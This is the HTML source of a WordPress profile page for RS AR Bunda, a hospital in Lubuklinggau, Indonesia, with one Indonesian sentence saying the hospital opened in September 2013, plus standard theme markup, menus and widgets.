<!DOCTYPE html>
<html lang="id-ID">
<head>
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11">
	<link rel="pingback" href="http://rsarbundallg.com/xmlrpc.php">

	<title>Profil RS. AR Bunda &#8211; RS AR Bunda Lubuklinggau</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="RS AR Bunda Lubuklinggau &raquo; Feed" href="http://rsarbundallg.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="RS AR Bunda Lubuklinggau &raquo; Umpan Komentar" href="http://rsarbundallg.com/comments/feed/" />
<link rel="alternate" type="application/rss+xml" title="RS AR Bunda Lubuklinggau &raquo; Profil RS. AR Bunda Umpan Komentar" href="http://rsarbundallg.com/2016/12/03/profil-rs-ar-bunda/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/rsarbundallg.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7.13"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='smuzsf-facebook-css'  href='http://rsarbundallg.com/wp-content/plugins/add-facebook/public/css/font-awesome.min.css?ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='ufbl-custom-select-css-css'  href='http://rsarbundallg.com/wp-content/plugins/ultimate-form-builder-lite/css/jquery.selectbox.css?ver=1.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='ufbl-front-css-css'  href='http://rsarbundallg.com/wp-content/plugins/ultimate-form-builder-lite/css/frontend.css?ver=1.3.4' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-google-fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C600%2C700%2C300&#038;ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-font-awesome-css'  href='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/css/font-awesome.min.css?ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-bxslider-css'  href='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/css/jquery.bxslider.css?ver=4.1.2' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-fancybox-css'  href='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/css/fancybox.css?ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-animate-css'  href='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/css/animate.css?ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-widgets-css'  href='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/css/widgets.css?ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-style-css'  href='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/style.css?ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-responsive-css'  href='http://rsarbundallg.com/wp-content/themes/eightmedi-pro/css/responsive.css?ver=4.7.13' type='text/css' media='all' />
<link rel='stylesheet' id='eightmedi-pro-typhography-font-css'  href='//fonts.googleapis.com/css?family=Open+Sans&#038;ver=4.7.13' type='text/css' media='all' />
<script type='text/javascript' src='http://rsarbundallg.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/plugins/add-facebook/public/scripts/facebook.js?ver=4.7.13'></script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/plugins/ultimate-form-builder-lite/js/jquery.selectbox-0.2.min.js?ver=1.3.4'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var frontend_js_obj = {"default_error_message":"This field is required","ajax_url":"http:\/\/rsarbundallg.com\/wp-admin\/admin-ajax.php","ajax_nonce":"2c7f143c1c"};
/* ]]> */
</script>
<script type='text/javascript' src='http://rsarbundallg.com/wp-content/plugins/ultimate-form-builder-lite/js/frontend.js?ver=1.3.4'></script>
<link rel='https://api.w.org/' href='http://rsarbundallg.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://rsarbundallg.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://rsarbundallg.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Dokter RS. AR Bunda Lubuklinggau' href='http://rsarbundallg.com/2016/12/02/list-dokter-rs-ar-bunda-lubuklinggau/' />
<link rel='next' title='Visi &#038; Misi' href='http://rsarbundallg.com/2016/12/03/visi-misi/' />
<meta name="generator" content="WordPress 4.7.13" />
<link rel="canonical" href="http://rsarbundallg.com/2016/12/03/profil-rs-ar-bunda/" />
<link rel='shortlink' href='http://rsarbundallg.com/?p=580' />
<link rel="alternate" type="application/json+oembed" href="http://rsarbundallg.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Frsarbundallg.com%2F2016%2F12%2F03%2Fprofil-rs-ar-bunda%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://rsarbundallg.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Frsarbundallg.com%2F2016%2F12%2F03%2Fprofil-rs-ar-bunda%2F&#038;format=xml" />
<style type='text/css' media='all'>.custom-appointment-form { background: url("https://8degreethemes.com/demo/themetest/wp-content/uploads/2015/07/male-doctor.png") no-repeat scroll right bottom rgba(0, 0, 0, 0); }
</style>
<style type="text/css" id="dynamic-styles"> .header-search > .fa:hover, .latest-news a:hover, .latest-news .news-single-title a:hover, .cta-wrap-right .cta-video-btn:hover, .cta-form-desc a.bttn:hover, .widget ul li a:hover, .ed_call_to_action .ed_call_to_action_button:hover, #es-top:hover::after, .callto-right .cta a:hover, .main-navigation .nav-menu li:hover a, .main-navigation .nav-menu li.current-menu-item a, .main-navigation .nav-menu li.current_page_item a {
        color : #0173ac ;
    }
 .main-navigation .nav-menu > li.menu-item-has-children::before, .btn-archive:hover::after, .ed_tab_wrap.vertical .tab-title.active::after, .entry-footer .cat-links a:hover, .entry-footer .comments-link a:hover, .entry-meta a:hover {
        border-bottom-color : #2b96cc ;
    }
 .top-header, a.caption-read-more, .featured-block, .bx-wrapper .bx-pager.bx-default-pager a, .appointment .ufbl-form-wrapper form input.ufbl-form-submit, a.btn, .widget_eightmedi_pro_icon_text .ed-icon-text .ed-icon-text-readmore .bttn, .about .about-content, .team-slider-wrap .bx-wrapper a.bx-prev, .team-slider-wrap .bx-wrapper a.bx-next, .call-to-action, .latest-news .news-date, .faqs-block .faqs-single-title:hover, .faqs-block .faqs-single-title.expand, .call-to-action-small figure::before, .footer-wrap, .team-slider .team-hover, .header-search .search-submit:hover, button, input[type='button'], input[type='reset'], input[type='submit'], .doctor-block-wrapper .doctor-social > a:hover, .error-404 input.search-submit, .nav-links a, .search-no-results input.search-submit, .social-shortcode a::after, .ed_toggle .ed_toggle_title, .ed-toggle-title, .ed_call_to_action .ed_call_to_action_button {
        background-color : #2b96cc ;
    }
 a.caption-read-more:hover, .featured-block.featured-post-2, .featured-block.featured-post-4, .bx-wrapper .bx-pager.bx-default-pager a:hover, .bx-wrapper .bx-pager.bx-default-pager a.active, .appointment .ufbl-form-wrapper form input.ufbl-form-submit:hover, a.btn:hover, .widget_eightmedi_pro_icon_text .ed-icon-text .ed-icon-text-readmore .bttn:hover, .team-slider-wrap .bx-wrapper .bx-prev:hover, .team-slider-wrap .bx-wrapper .bx-next:hover, .latest-news figure.news-image:hover .news-date, .main-footer, .main-navigation .nav-menu .sub-menu li.current-menu-item a, .main-navigation .nav-menu .sub-menu li.current_page_item a, .main-navigation .nav-menu .children li.current-menu-item a, .main-navigation .nav-menu .children li.current_page_item a, button:hover, input[type='button']:hover, input[type='reset']:hover, input[type='submit']:hover, .error-404 input.search-submit:hover, .nav-links a:hover, .search-no-results input.search-submit:hover, .ed_toggle.open .ed_toggle_title, .ed-toggle-title.open, .ed_toggle .ed_toggle_title:hover, .ed-toggle-title:hover, span.sub-click {
        background-color : #0173ac ;
    }
 .main-navigation .nav-menu li .sub-menu li a, .main-navigation .nav-menu li .children li a, .latest-news a::after, .cta-wrap-right .cta-video-btn:hover::after, .cta-form-desc a.bttn:hover:after {
        border-bottom-color : #0173ac ;
    }
 a.caption-read-more, .appointment .ufbl-form-wrapper form input.ufbl-form-submit, a.btn, .widget_eightmedi_pro_icon_text .ed-icon-text .ed-icon-text-readmore .bttn, button, input[type='button'], input[type='reset'], input[type='submit'] {
        box-shadow : 0 0 0 0 #0173ac;
    }
 a.caption-read-more:hover, .appointment .ufbl-form-wrapper form input.ufbl-form-submit:hover, a.btn:hover, .widget_eightmedi_pro_icon_text .ed-icon-text .ed-icon-text-readmore .bttn:hover, button:hover, input[type='button']:hover, input[type='reset']:hover, input[type='submit']:hover {
        box-shadow : 0 0 0 5px #0173ac;
    }
 .home-slider-pointer .fa, .header-search .search-submit, .entry-footer .cat-links a, .entry-footer .comments-link a, .entry-header > a:hover, .btn-archive:hover, .entry-meta a, h2.error-404-title, #ed-breadcrumbs a:hover, #es-top::after {
        color : #2b96cc ;
    }
  .about .btn, .call-to-action .cta-link a, .call-to-action-small .cta-link-small a {
        background-color : #0173ac;
        box-shadow : 0 0 0 0 #0173ac;
    }
  .about .btn:hover, .call-to-action .cta-link a:hover, .call-to-action-small .cta-link-small a:hover {
        border-color : #2b96cc ;
        box-shadow : 0 0 0 5px #0173ac;
    }
  .our-testimonial::after {
        background : rgba(1,115,172,0.9);
    }
  .header-search .search-submit:hover, .search-no-results input.search-submit, .ed_call_to_action .ed_call_to_action_button {
        border-color : #2b96cc;
    }
  .sidebar .widget-title, .sidebar .sidebar-title {
        background-color : rgba(43,150,204,0.3);
    }
  .sidebar .widget-title::after, .sidebar .sidebar-title::after {
        border-bottom-color : rgba(43,150,204,0.6);
    }
  .category-news article:hover figure {
        border-color : rgba(43,150,204,0.6);
    }
  a.home-slider-pointer.cta-btn {
        background : #cc444d;
    }
  .search-no-results input.search-submit:hover, .ed_call_to_action .ed_call_to_action_button:hover {
        border-color : #0173ac;
    }
  .ed_tab_wrap.vertical .tab-title.active::before {
        border-right-color : #2b96cc;
    }
  span.sub-click:hover {
        background : rgba(1,115,172,0.9);
    }
  @media screen and (max-width: 980px) {
  .main-navigation .nav-menu > li.menu-item-has-children:hover::after, .main-navigation .nav-menu > li.current-menu-item.menu-item-has-children::after, .main-navigation .nav-menu > li.current_page_item.menu-item-has-children::after {
            color : rgba(43,150,204,0.3);
        }
  .main-navigation .nav-menu li .sub-menu, .main-navigation .nav-menu li .children {
            background : #0173ac;
        }
  .main-navigation .nav-menu li .sub-menu li a:hover, .main-navigation .nav-menu li .children li a:hover {
            color : #2b96cc;
        }
  }
  body p {
        font-family : Open Sans ;
        font-size : 16pxpx ;
        line-height : 1.5 ;
        color : #000000 ;
    }
 body h1 {
        font-family : Open Sans ;
        font-size : 16pxpx ;
        line-height : 1.5 ;
        color : #2e8ecb ;
    }
 body h2 {
        font-family : Open Sans ;    
        font-size : 16pxpx ;
        line-height : 1.5 ;
        color : #2e8ecb ;
    }
 body h3 {
        font-family : Open Sans ;    
        font-size : 16pxpx ;
        line-height : 1.5 ;
        color : #2e8ecb ;
    }
 body h4 {
        font-family : Open Sans ;    
        font-size : 16pxpx ;
        line-height : 1.5 ;
        color : #2e8ecb ;
    }
 body h5 {
        font-family : Open Sans ;    
        font-size : 16pxpx ;
        line-height : 1.5 ;
        color : #2e8ecb ;
    }
 body h6 {
        font-family : Open Sans ;    
        font-size : 16pxpx ;
        line-height : 1.5 ;
        color : #2e8ecb ;
    }
</style>		<style type="text/css">.recentcomments a{display:inline !important;padding:0 !important;margin:0 !important;}</style>
		</head>

<body class="post-template-default single single-post postid-580 single-format-standard group-blog fullwidth ctypo">
	<div id="page" class="hfeed site">
		<a class="skip-link screen-reader-text" href="#content">Skip to content</a>
					<div class="top-header">
				<div class="ed-container-home">
					<div class="header-callto clear">
						<div class="callto-left">
							Selamat datang di website resmi RS AR Bunda Lubuklinggau						</div>
						<div class="callto-right">
							<div class="cta">
								<strong>E-mail:</strong> <a href="#">admin@rsarbundallg.com</a>							</div>
															<div class="header-social social-links">
												<div class="footer-social social-links">
				<div class="social-icons">
										<a href="https://www.facebook.com/rsarbundalubuklinggau/" class="facebook" data-title="Facebook" target="_blank"><i class="fa fa-facebook"></i></a>
									<a href="#" class="twitter" data-title="Twitter" target="_blank"><i class="fa fa-twitter"></i></a>
							<a href="#" class="gplus" data-title="Google Plus" target="_blank"><i class="fa fa-google-plus"></i></a>
					<a href="#" class="youtube" data-title="Youtube" target="_blank"><i class="fa fa-youtube"></i></a>
			<a href="#" class="pinterest" data-title="Pinterest" target="_blank"><i class="fa fa-pinterest"></i></a>
	<a href="#" class="linkedin" data-title="Linkedin" target="_blank"><i class="fa fa-linkedin"></i></a>
<a href="#" class="vimeo" data-title="Vimeo" target="_blank"><i class="fa fa-vimeo-square"></i></a>
<a href="https://www.instagram.com/rsarbundallg/" class="instagram" data-title="instagram" target="_blank"><i class="fa fa-instagram"></i></a>
<a href="skype:#" class="skype" data-title="Skype"><i class="fa fa-skype"></i></a>
</div>
</div>
								</div>
														

																	<div class="header-search">
										<i class="fa fa-search"></i>
										<form role="search" method="get" class="search-form" action="http://rsarbundallg.com/">
				<label>
					<span class="screen-reader-text">Cari untuk:</span>
					<input type="search" class="search-field" placeholder="Cari &hellip;" value="" name="s" />
				</label>
				<input type="submit" class="search-submit" value="Cari" />
			</form>									</div>
															
							</div>
						</div>
					</div>
				</div>
									<header id="masthead" class="site-header sticky-header" role="banner">
								<div class="ed-container-home center-align">
					<div class="site-branding">
						<div class="site-logo">
														</div>
							<div class="site-text">
								<a href="http://rsarbundallg.com/" rel="home">
									<h1 class="site-title">RS AR Bunda Lubuklinggau</h1>
									<p class="site-description">Melayani dengan Professional dan Tulus</p>
								</a>
							</div>
						</div><!-- .site-branding -->

						<nav id="site-navigation" class="main-navigation" role="navigation">
							<button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false">
																<span class="menu-bar menubar-first"></span>
								<span class="menu-bar menubar-second"></span>
								<span class="menu-bar menubar-third"></span>
							</button>
							<div class="menu-menu-1-container"><ul id="primary-menu" class="menu"><li id="menu-item-365" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-365"><a href="http://rsarbundallg.com">Home</a></li>
<li id="menu-item-366" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-custom-parent menu-item-has-children menu-item-366"><a href="http://rsarbundallg.com/category/news/">Berita</a>
<ul class="sub-menu">
	<li id="menu-item-854" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-854"><a href="http://rsarbundallg.com/sample-page/rekruitmen-staff/">Rekruitmen Staff</a></li>
</ul>
</li>
<li id="menu-item-552" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-ancestor current-menu-parent menu-item-has-children menu-item-552"><a href="http://rsarbundallg.com/2015/12/21/about-us/">Tentang Kami</a>
<ul class="sub-menu">
	<li id="menu-item-553" class="menu-item menu-item-type-custom menu-item-object-custom current-menu-item menu-item-553"><a href="http://rsarbundallg.com/2016/12/03/profil-rs-ar-bunda/">Profil RS. AR Bunda</a></li>
	<li id="menu-item-554" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-554"><a href="http://rsarbundallg.com/2016/12/03/visi-misi/">Visi &#038; Misi</a></li>
	<li id="menu-item-555" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-555"><a href="http://rsarbundallg.com">Struktur Organisasi</a></li>
	<li id="menu-item-556" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-556"><a href="http://rsarbundallg.com">Akreditasi</a></li>
	<li id="menu-item-557" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-557"><a href="http://rsarbundallg.com/contact/">Lokasi</a></li>
</ul>
</li>
<li id="menu-item-416" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-416"><a href="http://rsarbundallg.com">Pelayanan</a>
<ul class="sub-menu">
	<li id="menu-item-558" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-558"><a href="http://rsarbundallg.com/2016/12/03/rawat-inap/">Rawat Inap</a>
	<ul class="sub-menu">
		<li id="menu-item-567" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-567"><a href="http://rsarbundallg.com/ruang-inap-kelas-president-suite/">President Suite</a></li>
		<li id="menu-item-568" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-568"><a href="http://rsarbundallg.com/ruang-inap-kelas-vvip/">VVIP</a></li>
		<li id="menu-item-569" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-569"><a href="http://rsarbundallg.com/ruang-inap-kelas-vip/">VIP</a></li>
		<li id="menu-item-570" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-570"><a href="http://rsarbundallg.com/ruang-inap-kelas-utama/">Utama</a></li>
		<li id="menu-item-571" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-571"><a href="http://rsarbundallg.com/ruang-inap-kelas-1/">Kelas 1</a></li>
		<li id="menu-item-572" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-572"><a href="http://rsarbundallg.com/ruang-inap-kelas-2/">Kelas 2</a></li>
		<li id="menu-item-573" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-573"><a href="http://rsarbundallg.com/ruang-inap-kelas-3/">Kelas 3</a></li>
	</ul>
</li>
	<li id="menu-item-559" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-559"><a href="http://rsarbundallg.com/">Rawat Jalan</a>
	<ul class="sub-menu">
		<li id="menu-item-564" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-564"><a href="http://rsarbundallg.com/service/medcheck/">Medical Check Up</a></li>
		<li id="menu-item-565" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-565"><a href="http://rsarbundallg.com/poliklinik/">Poliklinik</a></li>
		<li id="menu-item-566" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-566"><a href="http://rsarbundallg.com/">Fisioterapi</a></li>
	</ul>
</li>
	<li id="menu-item-560" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-560"><a href="http://rsarbundallg.com/">Pelayanan 24 Jam</a>
	<ul class="sub-menu">
		<li id="menu-item-562" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-562"><a href="http://rsarbundallg.com/service/emergency-service/">IGD</a></li>
		<li id="menu-item-563" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-563"><a href="http://rsarbundallg.com/">Instalasi Farmasi</a></li>
	</ul>
</li>
	<li id="menu-item-561" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-561"><a href="http://rsarbundallg.com/">ICU/ICCU</a></li>
	<li id="menu-item-800" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-800"><a href="http://rsarbundallg.com/cara-mendapatkan-layanan/">Cara Mendapatkan Layanan</a></li>
</ul>
</li>
<li id="menu-item-415" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-415"><a href="http://rsarbundallg.com/2016/12/02/list-dokter-rs-ar-bunda-lubuklinggau/">Dokter</a></li>
<li id="menu-item-574" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-574"><a href="http://rsarbundallg.com/2017/06/03/jadwal-praktik-dokter-poliklinik/">Jadwal Praktik</a></li>
<li id="menu-item-575" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-has-children menu-item-575"><a href="http://rsarbundallg.com">Alur Pelayanan</a>
<ul class="sub-menu">
	<li id="menu-item-576" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-576"><a href="http://rsarbundallg.com/alur-rawat-inap/">Alur Pelayanan Rawat Inap</a></li>
	<li id="menu-item-577" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-577"><a href="http://rsarbundallg.com/alur-rawat-jalan/">Alur Pelayanan Rawat Jalan</a></li>
</ul>
</li>
<li id="menu-item-430" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-430"><a href="http://rsarbundallg.com/gallery/">Gallery</a></li>
<li id="menu-item-578" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-578"><a href="http://rsarbundallg.com/2016/12/03/fasilitas/">Fasilitas</a>
<ul class="sub-menu">
	<li id="menu-item-771" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-771"><a href="http://rsarbundallg.com/informasi-layanan/">Informasi Layanan</a></li>
</ul>
</li>
<li id="menu-item-579" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-579"><a href="http://rsarbundallg.com">Rekanan</a></li>
<li id="menu-item-424" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-424"><a href="http://rsarbundallg.com/contact/">Hubungi Kami</a></li>
</ul></div>						</nav><!-- #site-navigation -->
					</div>
				</header><!-- #masthead -->
								<div id="content" class="site-content">
<div class="ed-container">
	<div id="ed-breadcrumbs"><a href="http://rsarbundallg.com">Home</a> &raquo; <a href="http://rsarbundallg.com/category/news/">News</a> &raquo; <span class="current">Profil RS. AR Bunda</span></div>	<header class="page-header">
		<h1 class="page-title">Profil RS. AR Bunda</h1>	</header><!-- .entry-header -->
	<div class="entry-meta">
		<span class="posted-on">Posted on <a href="http://rsarbundallg.com/2016/12/03/profil-rs-ar-bunda/" rel="bookmark"><time class="entry-date published" datetime="2016-12-03T20:23:21+00:00">3 Desember 2016</time><time class="updated" datetime="2016-12-03T20:24:21+00:00">3 Desember 2016</time></a></span><span class="byline"> by <span class="author vcard"><a class="url fn n" href="http://rsarbundallg.com/author/"></a></span></span>	</div><!-- .entry-meta -->
		<div id="primary" class="content-area no-sidebar">
		<main id="main" class="site-main" role="main">

			
				
<article id="post-580" class="post-580 post type-post status-publish format-standard hentry category-news">
	
	<div class="entry-content">
				<p>Rumah Sakit AR Bunda Lubuklingg<wbr />au diresmikan<wbr /> pada tanggal 19 September 2013 memberikan<wbr /> pelayanan unggulan bagi masyarakat<wbr /> Kota Lubuklingg<wbr />au dan sekitarnya</p>
				</div><!-- .entry-content -->

		<footer class="entry-footer">
			<span class="cat-links">Posted in <a href="http://rsarbundallg.com/category/news/" rel="category tag">News</a></span>		</footer><!-- .entry-footer -->
	</article><!-- #post-## -->


				
	<nav class="navigation post-navigation" role="navigation">
		<h2 class="screen-reader-text">Navigasi pos</h2>
		<div class="nav-links"><div class="nav-previous"><a href="http://rsarbundallg.com/2016/12/02/list-dokter-rs-ar-bunda-lubuklinggau/" rel="prev">Dokter RS. AR Bunda Lubuklinggau</a></div><div class="nav-next"><a href="http://rsarbundallg.com/2016/12/03/visi-misi/" rel="next">Visi &#038; Misi</a></div></div>
	</nav>
				
<div id="comments" class="comments-area">

	
	
	
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Tinggalkan Balasan <small><a rel="nofollow" id="cancel-comment-reply-link" href="/2016/12/03/profil-rs-ar-bunda/#respond" style="display:none;">Batalkan balasan</a></small></h3>			<form action="http://rsarbundallg.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate>
				<p class="comment-notes"><span id="email-notes">Alamat email Anda tidak akan dipublikasikan.</span> Ruas yang wajib ditandai <span class="required">*</span></p><p class="comment-form-comment"><label for="comment">Komentar</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" aria-required="true" required="required"></textarea></p><p class="comment-form-author"><label for="author">Nama <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" aria-required='true' required='required' /></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="email" value="" size="30" maxlength="100" aria-describedby="email-notes" aria-required='true' required='required' /></p>
<p class="comment-form-url"><label for="url">Situs Web</label> <input id="url" name="url" type="url" value="" size="30" maxlength="200" /></p>
<p class="form-submit"><input name="submit" type="submit" id="submit" class="submit" value="Kirim Komentar" /> <input type='hidden' name='comment_post_ID' value='580' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments -->

			
		</main><!-- #main -->
	</div><!-- #primary -->
	</div>

</div><!-- #content -->

<footer id="colophon" class="site-footer" role="contentinfo">
	<div class="footer-wrap">
		<div class="ed-container-home">
			<div class="top-footer wow fadeInLeft"><aside id="calendar-3" class="widget widget_calendar"><h2 class="widget-title">Calendar</h2><div id="calendar_wrap" class="calendar_wrap"><table id="wp-calendar">
	<caption>Desember 2016</caption>
	<thead>
	<tr>
		<th scope="col" title="Senin">S</th>
		<th scope="col" title="Selasa">S</th>
		<th scope="col" title="Rabu">R</th>
		<th scope="col" title="Kamis">K</th>
		<th scope="col" title="Jumat">J</th>
		<th scope="col" title="Sabtu">S</th>
		<th scope="col" title="Minggu">M</th>
	</tr>
	</thead>

	<tfoot>
	<tr>
		<td colspan="3" id="prev"><a href="http://rsarbundallg.com/2015/12/">&laquo; Des</a></td>
		<td class="pad">&nbsp;</td>
		<td colspan="3" id="next"><a href="http://rsarbundallg.com/2017/06/">Jun &raquo;</a></td>
	</tr>
	</tfoot>

	<tbody>
	<tr>
		<td colspan="3" class="pad">&nbsp;</td><td><a href="http://rsarbundallg.com/2016/12/01/" aria-label="Pos diterbitkan pada December 1, 2016">1</a></td><td><a href="http://rsarbundallg.com/2016/12/02/" aria-label="Pos diterbitkan pada December 2, 2016">2</a></td><td><a href="http://rsarbundallg.com/2016/12/03/" aria-label="Pos diterbitkan pada December 3, 2016">3</a></td><td>4</td>
	</tr>
	<tr>
		<td>5</td><td>6</td><td>7</td><td>8</td><td>9</td><td>10</td><td>11</td>
	</tr>
	<tr>
		<td>12</td><td>13</td><td><a href="http://rsarbundallg.com/2016/12/14/" aria-label="Pos diterbitkan pada December 14, 2016">14</a></td><td><a href="http://rsarbundallg.com/2016/12/15/" aria-label="Pos diterbitkan pada December 15, 2016">15</a></td><td>16</td><td>17</td><td>18</td>
	</tr>
	<tr>
		<td>19</td><td>20</td><td>21</td><td>22</td><td>23</td><td>24</td><td>25</td>
	</tr>
	<tr>
		<td>26</td><td>27</td><td>28</td><td>29</td><td>30</td><td>31</td>
		<td class="pad" colspan="1">&nbsp;</td>
	</tr>
	</tbody>
	</table></div></aside><aside id="wpstatistics_widget-3" class="widget widget_wpstatistics_widget"><h2 class="widget-title">Statistik</h2><ul><li><label>Pengguna Online: </label>2</li><li><label>Todays Visits: </label>147</li><li><label>Todays Visitors: </label>38</li></ul></aside></div>		</div>
		<div class="main-footer">
			<div class="ed-container-home">
				<div class="site-info">
					copyright RS AR Bunda Lubuklinggau 2016				</div><!-- .site-info -->
								
							<div class="footer-social social-links">
				<div class="social-icons">
										<a href="https://www.facebook.com/rsarbundalubuklinggau/" class="facebook" data-title="Facebook" target="_blank"><i class="fa fa-facebook"></i></a>
									<a href="#" class="twitter" data-title="Twitter" target="_blank"><i class="fa fa-twitter"></i></a>
							<a href="#" class="gplus" data-title="Google Plus" target="_blank"><i class="fa fa-google-plus"></i></a>
					<a href="#" class="youtube" data-title="Youtube" target="_blank"><i class="fa fa-youtube"></i></a>
			<a href="#" class="pinterest" data-title="Pinterest" target="_blank"><i class="fa fa-pinterest"></i></a>
